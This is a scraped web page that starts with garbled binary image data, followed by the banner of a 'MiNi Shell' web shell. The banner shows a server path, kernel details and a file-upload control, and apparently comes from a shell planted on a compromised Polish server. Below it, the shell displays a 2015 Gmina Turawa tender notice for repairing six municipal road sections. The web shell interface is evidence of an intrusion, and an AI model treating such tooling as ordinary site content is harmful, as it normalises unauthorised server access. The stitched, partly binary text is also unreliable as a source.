JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150707/168726-N-2015.html

<p class="kh_header"><b>Turawa: Remonty dróg gminnych na terenie Gminy Turawa
(z podziałem na sześć części)</b><br>
<b>Numer ogłoszenia: 168726 - 2015; data zamieszczenia: 07.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Turawa , ul. Opolska 39c, 46-045 Turawa, woj. opolskie, tel. 077 4212012, faks 077 4212073.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.turawa.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty dróg gminnych na terenie Gminy Turawa
(z podziałem na sześć części).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są: 
Remonty dróg gminnych na terenie Gminy Turawa
(z podziałem na sześć części)

2.	Szczegółowy zakres rzeczowy robót z podziałem na zadania częściowe obejmuje:

2.1.	Zadanie częściowe nr I - Remont drogi gminnej - ulicy Dobrodzieńskiej                   w miejscowości Ligota Turawska (etap I) - odcinek A-B i C-D.

2.1.1.	Ogólny obmiar inwestycji:
1)	odcinek A-B:
a)	Długość odcinka  - 98,00 mb;
b)	Szerokość jezdni -  3,0 m;
c)	Szerokość poboczy z kamienia - 2 x 0,5 m;
d)	Rodzaj nawierzchni jezdni - beton asfaltowy.

2)	odcinek C-D:
a)	Długość odcinka  - 146,00 mb;
b)	Szerokość jezdni -  3,0 m;
c)	Szerokość poboczy z kamienia - 2 x 0,5 m lub do granicy działki;
d)	Rodzaj nawierzchni jezdni - beton asfaltowy.

2.1.2.	 Zakres zamówienia obejmuje:
a)	Roboty przygotowawcze i pomiarowe;
b)	Korytowanie istniejącej nawierzchni;
c)	Wykonanie dolnej warstwy podbudowy z kruszywa łamanego 0-63 mm gr. 15 cm;
d)	Wykonanie górnej warstwy podbudowy z kruszywa łamanego 0-31,5 mm gr. 10 cm;
e)	Wyrównanie i zagęszczenie do uzyskania właściwej niwelety;
f)	   Niweletę drogi należy dostosować do wysokości istniejących bram wjazdowych;
g)	Wykonanie dywanika z betonu asfaltowego - grub. 8 cm (w dwóch warstwach: 4 cm warstwa wyrównawcza (wiążąca) AC16W 50/70  i 4 cm warstwa ścieralna AC11S 50/70);
h)	Uzupełnienie poboczy z kruszywa łamanego 0-31,5 mm - grub. 8 cm;
i)	  Wykonanie oznakowania pionowego;
j)	Uporządkowanie terenu plantowanie;
k)	Skompletowanie i przekazanie Zamawiającemu operatu powykonawczego inwestycji wraz z inwentaryzacją geodezyjną;

2.1.3.	Szczegółowy opis i zakres przedmiotu zamówienia oraz jego parametry techniczne przedstawione zostały w dokumentacji projektowej oraz w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, stanowiących załączniki nr 10a i 11a do  Specyfikacji Istotnych Warunków Zamówienia.


2.2.	Zadanie częściowe nr II - Remont drogi gminnej - ulicy Leśnej                              w miejscowości Kadłub Turawski - odcinek E-F.

2.2.1.	Ogólny obmiar inwestycji:
a)	Długość odcinka  - 200 mb;
b)	Szerokość jezdni -  3,0 m;
c)	Szerokość poboczy z kamienia - 2 x 0,75 m lub do granicy działki;
d)	Rodzaj nawierzchni jezdni - beton asfaltowy.

2.2.2.	Zakres zamówienia obejmuje:
a)	Roboty przygotowawcze i pomiarowe;
b)	Korytowanie istniejącej nawierzchni;
c)	Wykonanie dolnej warstwy podbudowy z kruszywa łamanego 0-63 mm gr. 15 cm;
d)	Wykonanie górnej warstwy podbudowy z kruszywa łamanego 0-31,5 mm gr. 10 cm;
e)	Wyrównanie i zagęszczenie do uzyskania właściwej niwelety;
f)	Niweletę drogi należy dostosować do wysokości istniejących bram wjazdowych;
g)	Wykonanie dywanika z betonu asfaltowego - grub. 8 cm (w dwóch warstwach: 4 cm warstwa wyrównawcza (wiążąca) AC16W 50/70  i 4 cm warstwa ścieralna AC11S 50/70);
h)	Uzupełnienie poboczy z kruszywa łamanego 0-31,5 mm - grub. 8 cm;
i)	Wykonanie oznakowania pionowego;
j)	Uporządkowanie terenu plantowanie;
k)	Skompletowanie i przekazanie Zamawiającemu operatu powykonawczego inwestycji wraz z inwentaryzacją geodezyjną;

2.2.3.	Szczegółowy opis i zakres przedmiotu zamówienia oraz jego parametry techniczne przedstawione zostały w dokumentacji projektowej oraz w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, stanowiących załączniki nr 10b i 11b do  Specyfikacji Istotnych Warunków Zamówienia.


2.3.	Zadanie częściowe nr III - Remont drogi gminnej - ulicy Kolanowskiej                             w miejscowości Zawada (etap I) - odcinek A-B.

2.3.1.	Ogólny obmiar inwestycji:
a)	Długość odcinka  - 127 mb;
b)	Szerokość jezdni -  3,5 m;
c)	Szerokość poboczy z kamienia - 2 x 0,5 m;
d)	Rodzaj nawierzchni jezdni - beton asfaltowy.

2.3.2.	Zakres zamówienia obejmuje:
a)	Roboty przygotowawcze i pomiarowe;
b)	Korygowanie nawierzchni drogi;
c)	Wykonanie dolnej warstwy podbudowy z kamienia granitowego lub bazaltowego 0-63 mm gr. 15 cm (dotyczy również poboczy);
d)	Wykonanie górnej warstwy podbudowy z kamienia granitowego lub bazaltowego 0-31,5 mm gr. 15 cm (dotyczy również poboczy);
e)	Wyrównanie i zagęszczenie do uzyskania właściwej niwelety;
f)	Oś drogi należy dostosować do warunków terenowych;
g)	Skroplenie emulsją asfaltową w ilości 1,0kg/m2;
h)	Wykonanie warstwy wiążącej z betonu asfaltowego AC16W 50/70 grub. 4 cm;
i)	Skroplenie emulsją asfaltową w ilości 0,5kg/m2;
j)	Wykonanie warstwy ścieralnej z betonu asfaltowego AC11S 50/70 grub. grub. 4 cm;
k)	Uzupełnienie poboczy kruszywem łamanym 0-31,5 mm - grub. 8 cm; szer. 0,50 m;
l)	Uporządkowanie terenu plantowanie;
m)	Skompletowanie i przekazanie Zamawiającemu operatu powykonawczego inwestycji wraz z inwentaryzacją geodezyjną.

2.3.3.	Szczegółowy opis i zakres przedmiotu zamówienia oraz jego parametry techniczne przedstawione zostały w dokumentacji projektowej oraz w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, stanowiących załączniki nr 10c i 11c do Specyfikacji Istotnych Warunków Zamówienia.


2.4.	Zadanie częściowe nr IV - Remont drogi gminnej - bocznej od ulicy Cmentarnej w miejscowości Osowiec.

2.4.1.	Ogólny obmiar inwestycji:
a)	Długość odcinka  - 143 mb;
b)	Szerokość jezdni -  3,0 m;
c)	Szerokość poboczy z kamienia - 2 x 0,5 m;
d)	Rodzaj nawierzchni jezdni - beton asfaltowy.

2.4.2.	  Zakres zamówienia obejmuje:
a)	Roboty przygotowawcze i pomiarowe;
b)	Korytowanie istniejącej nawierzchni;
c)	Wykonanie dolnej warstwy podbudowy z kruszywa łamanego 0-63 mm gr. 15 cm;
d)	Wykonanie górnej warstwy podbudowy z kruszywa łamanego 0-31,5 mm gr. 10 cm;
e)	Wyrównanie i zagęszczenie do uzyskania właściwej niwelety;
f)	Niweletę drogi należy dostosować do wysokości istniejących bram wjazdowych;
g)	Wykonanie dywanika z betonu asfaltowego - grub. 8 cm (w dwóch warstwach: 4 cm warstwa wyrównawcza (wiążąca) AC16W 50/70  i 4 cm warstwa ścieralna AC11S 50/70);
h)	Uzupełnienie poboczy z kruszywa łamanego 0-31,5 mm - grub. 8 cm;
i)	Wykonanie oznakowania pionowego;
j)	Uporządkowanie terenu plantowanie;
k)	Skompletowanie i przekazanie Zamawiającemu operatu powykonawczego inwestycji wraz z inwentaryzacją geodezyjną;

2.4.3.	Szczegółowy opis i zakres przedmiotu zamówienia oraz jego parametry techniczne przedstawione zostały w dokumentacji projektowej oraz w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, stanowiących załączniki nr 10d i 11d do  Specyfikacji Istotnych Warunków Zamówienia.


2.5.	Zadanie częściowe nr V - Remont drogi gminnej - ulicy Nadleśnej w miejscowości Bierdzany (etap I) - odcinek C-D.

2.5.1.	Ogólny obmiar inwestycji:
a)	Długość odcinka  - 110 mb;
b)	Szerokość jezdni -  3,0 m;
c)	Szerokość poboczy z kamienia - 2 x 0,5 m;
d)	Rodzaj nawierzchni jezdni - beton asfaltowy.

2.5.2.	Zakres zamówienia obejmuje:
a)	Roboty przygotowawcze i pomiarowe;
b)	Korygowanie nawierzchni drogi;
c)	Wykonanie dolnej warstwy podbudowy z kamienia granitowego lub bazaltowego 0-63 mm gr. 15 cm (dotyczy również poboczy);
d)	Wykonanie górnej warstwy podbudowy z kamienia granitowego lub bazaltowego 0-31,5 mm gr. 15 cm (dotyczy również poboczy);
e)	Wyrównanie i zagęszczenie do uzyskania właściwej niwelety;
f)	Oś drogi należy dostosować do warunków terenowych;
g)	Skroplenie emulsją asfaltową w ilości 1,0kg/m2;
h)	Wykonanie warstwy wiążącej z betonu asfaltowego AC16W 50/70 grub. 4 cm;
i)	Skroplenie emulsją asfaltową w ilości 0,5kg/m2;
j)	Wykonanie warstwy ścieralnej z betonu asfaltowego AC11S 50/70 grub. grub. 4 cm;
k)	Uzupełnienie poboczy kruszywem łamanym 0-31,5 mm - grub. 8 cm; szer. 0,50 m;
l)	Uporządkowanie terenu plantowanie;
m)	Skompletowanie i przekazanie Zamawiającemu operatu powykonawczego inwestycji wraz z inwentaryzacją geodezyjną.

2.5.3.	Szczegółowy opis i zakres przedmiotu zamówienia oraz jego parametry techniczne przedstawione zostały w dokumentacji projektowej oraz w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, stanowiących załączniki nr 10e i 11e do  Specyfikacji Istotnych Warunków Zamówienia.


2.6.	Zadanie częściowe nr VI - Remont drogi gminnej - ulicy Dębowej                            w miejscowości Bierdzany  - odcinek A-B i C-D.

2.6.1.	Ogólny obmiar inwestycji:
1)	odcinek A-B:
a)	Długość odcinka  - 176,50 mb;
b)	Szerokość jezdni -  3,0 m;
c)	Szerokość poboczy z kamienia - 2 x 0,5 m;
d)	Rodzaj nawierzchni jezdni - beton asfaltowy.

2)	odcinek C-D:
a)	Długość odcinka  - 60,0 mb;
b)	Szerokość jezdni -  3,0 m;
c)	Szerokość poboczy z kamienia - 2 x 0,5 m;
d)	Rodzaj nawierzchni jezdni - beton asfaltowy.

2.6.2.	Zakres zamówienia obejmuje:
a)	Roboty przygotowawcze i pomiarowe;
b)	Korygowanie nawierzchni drogi;
c)	Wykonanie warstwy podbudowy z kamienia łamanego granitowego lub bazaltowego 0-31,5 mm gr. 20cm (dotyczy również poboczy);
d)	Na odcinku C-D zachodzi konieczność poszerzenia korony drogi pod nową konstrukcję. W związku z tym konieczne jest dodatkowe zdjęcie humusu i wbudowanie nasypu z pospółki.
e)	Wyrównanie i zagęszczenie do uzyskania właściwej niwelety;
f)	Wykonanie warstwy wyrównawczej (wiążącej) z betonu asfaltowego AC16W 50/70 grub. 3 cm;
g)	Wykonanie warstwy ścieralnej z betonu asfaltowego AC11S 50/70 grub. 4 cm;
h)	Uzupełnienie poboczy kruszywem łamanym 0-31,5 mm -szer. 0,50 m;
i)	Uporządkowanie terenu plantowanie;
j)	Skompletowanie i przekazanie Zamawiającemu operatu powykonawczego inwestycji wraz z inwentaryzacją geodezyjną.

2.6.3.	Szczegółowy opis i zakres przedmiotu zamówienia oraz jego parametry techniczne przedstawione zostały w dokumentacji projektowej oraz w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, stanowiących załączniki nr 10f i 11f do  Specyfikacji Istotnych Warunków Zamówienia.

2.3.	Wizja lokalna - zaleca się aby każdy z wykonawców dokonał wizji lokalnej celem sprawdzenia warunków placu budowy, warunków związanych z wykonaniem prac będących przedmiotem przetargu oraz celem uzyskania dodatkowych informacji koniecznych i przydatnych do przygotowania oferty, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy. Koszt wizji lokalnej poniesie Wykonawca.

2.4.	Wykonawca udzieli gwarancji na wykonanie przedmiotu zamówienia (materiały, robocizna, sprzęt) na okres wskazany w formularzu ofertowym, lecz nie krótszy niż 5 lat (oświadczenie zawarte w formularzu oferty).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Przedmiotem zamówień uzupełniających jest powtórzenie tego samego rodzaju robót co w zamówieniu podstawowym, stanowiących nie więcej niż 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt 6  Prawa zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 50.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium.
Ustala się wadium w wysokości: 
1.	2 500,00 złotych,  (słownie: dwa tysiące pięćset złotych)  dla zadania częściowego nr I;
2.	2 500,00 złotych,  (słownie: dwa tysiące pięćset złotych)  dla zadania częściowego nr II;
3.	1 500,00 złotych,  (słownie: jeden tysiąc pięćset złotych)  dla zadania częściowego nr III;
4.	1 500,00 złotych,  (słownie: jeden tysiąc pięćset złotych)  dla zadania częściowego nr IV;
5.	1 500,00 złotych,  (słownie: jeden tysiąc pięćset złotych)  dla zadania częściowego nr V;
6.	2 000,00 złotych,  (słownie: dwa tysiące złotych)  dla zadania częściowego nr VI</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udokumentowanie wykonania, w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonych, w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch inwestycji o charakterze i złożoności porównywalnej z zakresem niniejszego zamówienia, polegających na:
1.	budowie, przebudowie lub remoncie drogi o nawierzchni asfaltowej                    o długości min. 200,00 m każda z nich - dla zadania częściowego nr I;
2.	budowie, przebudowie lub remoncie drogi o nawierzchni asfaltowej                   o długości min. 180,00 m każda z nich - dla zadania częściowego nr II;
3.	budowie, przebudowie lub remoncie drogi o nawierzchni asfaltowej                  o długości min. 100,00 m każda z nich - dla zadania częściowego nr III;
4.	budowie, przebudowie lub remoncie drogi o nawierzchni asfaltowej                   o długości min. 120,00 m każda z nich - dla zadania częściowego nr IV;
5.	budowie, przebudowie lub remoncie drogi o nawierzchni asfaltowej                o długości min. 100,00 m każda z nich - dla zadania częściowego nr V;
6.	budowie, przebudowie lub remoncie drogi o nawierzchni asfaltowej             o długości min. 200,00 m każda z nich - dla zadania częściowego nr VI.

Ocena spełnienia warunku nastąpi na podstawie złożonego przez Wykonawcę:
1)	wykazu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania (zgodnie z załącznikiem nr 5 do  SIWZ);
2)	dowodu dotyczącego najważniejszych robót, określającego, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
Dowodem o którym mowa powyżej jest: 
a) poświadczenie; 
b) inny dokument - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, którym mowa w pkt a);
W przypadku gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie, o którym mowa w punkt 1) zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w punkt 2).
W przypadku  wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich  łączne doświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobami zdolnymi do wykonania zamówienia posiadającymi wymagane przepisami uprawnienia:
osoba pełniąca funkcję kierownika budowy winna posiadać uprawnienia do kierowania budową i robotami budowlanymi w specjalności drogowej oraz należeć do właściwej Izby Samorządu Zawodowego.

Ocena spełnienia warunku nastąpi na podstawie złożonego przez Wykonawcę:
1)	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informację o podstawie do dysponowania tymi osobami (zgodnie  załącznikiem nr 6 do SIWZ);
2)	oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (zgodnie z załącznikiem nr 7 do SIWZ).
W przypadku  wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich  łączny potencjał kadrowy oraz  kwalifikacje.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

